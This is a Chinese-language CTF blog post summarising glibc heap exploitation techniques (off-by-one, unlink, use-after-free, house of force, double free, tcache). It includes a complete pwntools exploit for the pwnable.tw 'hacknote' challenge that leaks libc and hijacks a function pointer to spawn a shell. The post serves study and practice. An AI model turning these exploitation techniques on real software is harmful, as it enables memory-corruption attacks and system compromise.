<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="y1seco" />



<meta name="description" content="堆基础总结">
<meta property="og:type" content="article">
<meta property="og:title" content="堆题总结">
<meta property="og:url" content="https://y1seco.github.io/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Y1secoのblog">
<meta property="og:description" content="堆基础总结">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190305154531-a6fafb78-3f1a-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190313123823-d61a9032-4549-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190313123837-de246bae-4549-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190313123859-eb7d95dc-4549-1.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/c9a4fb89febac9551f72c9dd1c35929f.png">
<meta property="article:published_time" content="2022-01-27T12:37:19.672Z">
<meta property="article:modified_time" content="2022-01-27T12:37:09.287Z">
<meta property="article:author" content="y1seco">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190305154531-a6fafb78-3f1a-1.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Y1secoのblog" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>堆题总结 | Y1secoのblog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: 
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kernel/" rel="tag">Kernel</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flask/" rel="tag">flask</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/leetcode/" rel="tag">leetcode</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" rel="tag">数据结构</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-堆题总结" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/" class="article-date">
      <time datetime="2022-01-27T12:37:19.672Z" itemprop="datePublished">2022-01-27</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      堆题总结
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/pwn/">pwn</a>
    </div>


        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>堆基础总结</p>
<span id="more"></span>

<h2 id="堆数据结构"><a href="#堆数据结构" class="headerlink" title="堆数据结构"></a>堆数据结构</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &lt;-- chunk </span><br><span class="line">| 		prev_size		 |	  	size  		|A|M|P|</span><br><span class="line">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">| <span class="function">user <span class="title">data</span>	<span class="params">(fd)</span>		 |	 	<span class="params">(bk)</span>			  |</span></span><br><span class="line"><span class="function">|												|</span></span><br><span class="line"><span class="function">|												|</span></span><br><span class="line"><span class="function">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &lt;-- next chunk</span></span><br></pre></td></tr></table></figure>



<h2 id="Off-By-One"><a href="#Off-By-One" class="headerlink" title="Off By One"></a>Off By One</h2><h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>使用循环语句向堆块中写入数据时，循环次数设置错误导致多写入了一个字节</p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><ol>
<li><p>溢出字节为可控制任意字节：通过修改大小造成块结构之间出现重叠，从而泄露其他块数据，或是覆盖其他块数据。也可使用 NULL 字节溢出的方法</p>
</li>
<li><p>溢出字节为 NULL 字节：在 size 为 0x100 的时候，溢出 NULL 字节可以使得 <code>prev_in_use</code> 位被清，这样前块会被认为是 free 块。</p>
<p>（1） 这时可以选择使用 unlink 方法（见 unlink 部分）进行处理。</p>
<p>（2） 另外，这时 <code>prev_size</code> 域就会启用，就可以伪造 <code>prev_size</code> ，从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 <code>prev_size</code> 找到的块的大小与<code>prev_size</code> 是否一致。</p>
</li>
</ol>
<h2 id="Large-bin"><a href="#Large-bin" class="headerlink" title="Large bin"></a>Large bin</h2><p>当large bin 中只存在一个chunk时，那么该chunk的两个nextsize 指针都会指向自己</p>
<h2 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h2><p>unlink过程如下图所示，主要实现堆块合并</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190305154531-a6fafb78-3f1a-1.png" alt="img"></p>
<p>对于unlink(P,BK,FD)函数本质是赋值</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">unlink(P,BK,FD)&#123;</span><br><span class="line">    FD = P -&gt; fd;</span><br><span class="line">    BK = p -&gt; bk;</span><br><span class="line">    FD -&gt; bk = BK;</span><br><span class="line">    BK -&gt; fd = fd;      </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>堆块结构FD = *(p-0x10)，0x10是由fd指针在堆块的位置决定的，具体利用过程</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*(P-&gt;fd+<span class="number">0x18</span>) = *(P-&gt;bk)</span><br><span class="line">*(P-&gt;bk+<span class="number">0x10</span>) = *(P-&gt;fd)</span><br></pre></td></tr></table></figure>



<h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><h3 id="漏洞原理-1"><a href="#漏洞原理-1" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>申请任意大小的堆块并在删除时未清空指针数组（即没有设置为NUL），导致悬空指针从而产生UAF</p>
<h3 id="利用思路-1"><a href="#利用思路-1" class="headerlink" title="利用思路"></a>利用思路</h3><p>例题： pwnable.tw - hacknote</p>
<p>解题思路：</p>
<p>通过UAF调用一个存在于堆块，并且被一系列对操作篡改的函数指针控制流劫持从而getshell</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/02/03/hacknote/">具体参考文章</a></p>
</blockquote>
<h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc_32.so.6&#x27;</span>)</span><br><span class="line"><span class="comment"># io = process(&#x27;./hacknote&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;chall.pwnable.tw&#x27;</span>,<span class="number">10102</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">	io.recvuntil(<span class="string">&quot;choice :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">	io.recvuntil(<span class="string">&quot;size :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">	io.recvuntil(<span class="string">&quot;Content :&quot;</span>)</span><br><span class="line">	io.sendline(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">num</span>):</span></span><br><span class="line">	io.recvuntil(<span class="string">&quot;choice :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">	io.recvuntil(<span class="string">&quot;Index :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="built_in">str</span>(num))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">num</span>):</span></span><br><span class="line">	io.recvuntil(<span class="string">&quot;choice :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="string">&quot;3&quot;</span>)</span><br><span class="line">	io.recvuntil(<span class="string">&quot;Index :&quot;</span>)</span><br><span class="line">	io.sendline(<span class="built_in">str</span>(num))</span><br><span class="line"></span><br><span class="line">add(<span class="number">64</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">32</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">64</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">show(<span class="number">2</span>)    //unsortbin泄露libc地址</span><br><span class="line"></span><br><span class="line">libc_base = u32(io.recv(<span class="number">8</span>)[<span class="number">4</span>:<span class="number">8</span>])-<span class="number">0x1b07b0</span></span><br><span class="line">system_addr = libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">8</span>,p32(system_addr)+<span class="string">&quot;;sh\x00&quot;</span>)</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="house-of-force"><a href="#house-of-force" class="headerlink" title="house of force"></a>house of force</h2><h3 id="利用前提"><a href="#利用前提" class="headerlink" title="利用前提"></a>利用前提</h3><ul>
<li>能够控制top chunk的size域（如堆溢出）</li>
<li>能够自由控制堆分配size大小，如申请负数的堆</li>
</ul>
<p>向上申请chunk实现任意地址写</p>
<h3 id="例题-bamboobox"><a href="#例题-bamboobox" class="headerlink" title="例题 bamboobox"></a>例题 bamboobox</h3><p>修改长度可以覆盖到top chunk的size位置从而修改top chunk size= -1,因为size为无符号数，-1被解释为0xffffff。</p>
<p>利用house of force 将top chunk位置放在heap base，可以是got表地址也可以是分配的堆块地址。</p>
<p>再申请一个0x10堆块去修改函数指针为指定地址。</p>
<h2 id="Double-Free"><a href="#Double-Free" class="headerlink" title="Double Free"></a>Double Free</h2><h3 id="漏洞原理-2"><a href="#漏洞原理-2" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>free了两次堆块，在glibc中的检查如下：</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190313123823-d61a9032-4549-1.png" alt="img"></p>
<p>检查main_arean是否指向了原来的一个chunk,绕过只需要</p>
<p>free(p1);free(p2);free(p1)，改写fdd指针一般执行add函数，然后连续free出chunk2,chunk1和构造的fake_chunk（这个chunk的地址在got表上），对got表进行一个覆写，将puts函数got表改写成magic函数的地址。</p>
<h3 id="利用思路-2"><a href="#利用思路-2" class="headerlink" title="利用思路"></a>利用思路</h3><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190313123837-de246bae-4549-1.png" alt="img"></p>
<p> malloc出一个chunk1，更改chunk1的fd，又由于此时chunk1在fastbin list，因此可以指向一个fakebin实现任意地址写</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190313123859-eb7d95dc-4549-1.png" alt="img"></p>
<h2 id="Off-by-null-amp-amp-Tcache-amp-amp-Overlap"><a href="#Off-by-null-amp-amp-Tcache-amp-amp-Overlap" class="headerlink" title="Off by null &amp;&amp; Tcache &amp;&amp; Overlap"></a>Off by null &amp;&amp; Tcache &amp;&amp; Overlap</h2><ul>
<li><p>off-by-null: 利用改写将pre_issue位改成\x00然后导致前面一个堆块莫名其妙的就free了（当然不是真的莫名其妙，详细请看堆块结构和记录，简单的说就是pre_issue是位了记录前一个堆块free or use 情况的）。接着就是利用堆块合并，获得一个free的但是其实并没有free的堆块，这就是overlap。整个过程其实说明了，off-by-null可以触发overlap，并且还是powerful的，可以用来泄漏地址。也可以用来修改fd</p>
<blockquote>
<p>strcpy 字符串函数:复制时，遇到结束符 <code>\x00</code> 才会停止复制。复制结束后，会在最后写入一个结束符 <code>\x00</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c9a4fb89febac9551f72c9dd1c35929f.png" alt="Pasted image 20210923152332.png"></p>
<p>strlen: j不将’\x00’结束符计入字符串长度</p>
</blockquote>
</li>
<li><p>tcache: 这个机制和fastbin很像，但是为了效率会比fastbin少很多检查。并且堆块都会在tacahe走一遍再出来给我们使用，有一些特殊情况不会比如合并了的unsortedbin。他总共有7个，满了才会用其他的类别的chunk。对double free的检查基本没有。</p>
</li>
</ul>
<p>例题：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43921239/article/details/109252945">HITCON_2018_children_tcache</a></p>
<p>待补充ing…</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a target="_blank" rel="noopener" href="https://trick.ink/article/Heap_Learn/">https://trick.ink/article/Heap_Learn/</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_56897090/article/details/120510003">https://blog.csdn.net/m0_56897090/article/details/120510003</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/system/171261.html">https://www.freebuf.com/system/171261.html</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4324#toc-15">https://xz.aliyun.com/t/4324#toc-15</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/">堆题总结</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2022-01-27, 20:37:19</p>
        <p><span>Updated:</span>2022-01-27, 20:37:09</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/" title="堆题总结">https://y1seco.github.io/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/</a>
            <span class="copy-path" data-clipboard-text="From https://y1seco.github.io/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2022/01/30/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C%EF%BC%89/">
                    leetcode数据结构刷题（二）
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2022/01/27/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">
                    leetcode数据结构刷题(一)
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84"><span class="toc-number">1.</span> <span class="toc-text">堆数据结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Off-By-One"><span class="toc-number">2.</span> <span class="toc-text">Off By One</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">2.2.</span> <span class="toc-text">利用思路</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Large-bin"><span class="toc-number">3.</span> <span class="toc-text">Large bin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unlink"><span class="toc-number">4.</span> <span class="toc-text">unlink</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UAF"><span class="toc-number">5.</span> <span class="toc-text">UAF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1"><span class="toc-number">5.1.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF-1"><span class="toc-number">5.2.</span> <span class="toc-text">利用思路</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#EXP"><span class="toc-number">5.2.1.</span> <span class="toc-text">EXP</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-force"><span class="toc-number">6.</span> <span class="toc-text">house of force</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%89%8D%E6%8F%90"><span class="toc-number">6.1.</span> <span class="toc-text">利用前提</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-bamboobox"><span class="toc-number">6.2.</span> <span class="toc-text">例题 bamboobox</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Double-Free"><span class="toc-number">7.</span> <span class="toc-text">Double Free</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2"><span class="toc-number">7.1.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF-2"><span class="toc-number">7.2.</span> <span class="toc-text">利用思路</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Off-by-null-amp-amp-Tcache-amp-amp-Overlap"><span class="toc-number">8.</span> <span class="toc-text">Off by null &amp;&amp; Tcache &amp;&amp; Overlap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-number">9.</span> <span class="toc-text">参考文章</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"堆题总结　| Y1secoのblog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2022/01/30/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C%EF%BC%89/" title="Pre: leetcode数据结构刷题（二）">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2022/01/27/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" title="Next: leetcode数据结构刷题(一)">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2022/03/03/BUUOJ%20PWN%20EXERCISE(%E4%B8%89%EF%BC%89/">BUUOJ PWN EXERCISE(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/27/CTFSHOW%E5%8D%B7%E7%8E%8B%E6%9D%AF-%20Incomplete%20Menu/">CTFSHOW卷王杯-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/27/gyctf_2020_force/">gyctf_2020_force</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/18/BUUCTF%20Pwn%20Exercise/">BUUCTF Pwn Exercise(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/17/%E3%80%90%E7%8E%8B%E9%81%93%E8%80%83%E7%A0%94%20%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%20%E3%80%91%E5%9F%BA%E7%A1%80%E7%AE%97%E6%B3%95%E4%BB%A3%E7%A0%81%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93%20C%E8%AF%AD%E8%A8%80(%E6%A0%91%E5%92%8C%E5%9B%BE%EF%BC%89/">数据结构基础代码总结（树和图）</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/13/flask%E9%85%8D%E7%BD%AE%E5%BC%82%E6%AD%A5%E4%BB%BB%E5%8A%A1/">flask配置celery异步任务</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/09/Kernel%20Pwn%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%80%EF%BC%89/">Kernel Pwn 学习（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/01/xdctf2015_pwn200/">xdctf2015_pwn200</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/30/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C%EF%BC%89/">leetcode数据结构刷题（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/27/%E5%A0%86%E9%A2%98%E6%80%BB%E7%BB%93/">堆题总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/27/leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">leetcode数据结构刷题(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/24/cmcc_simplerop/">cmcc_simplerop</a></li><li 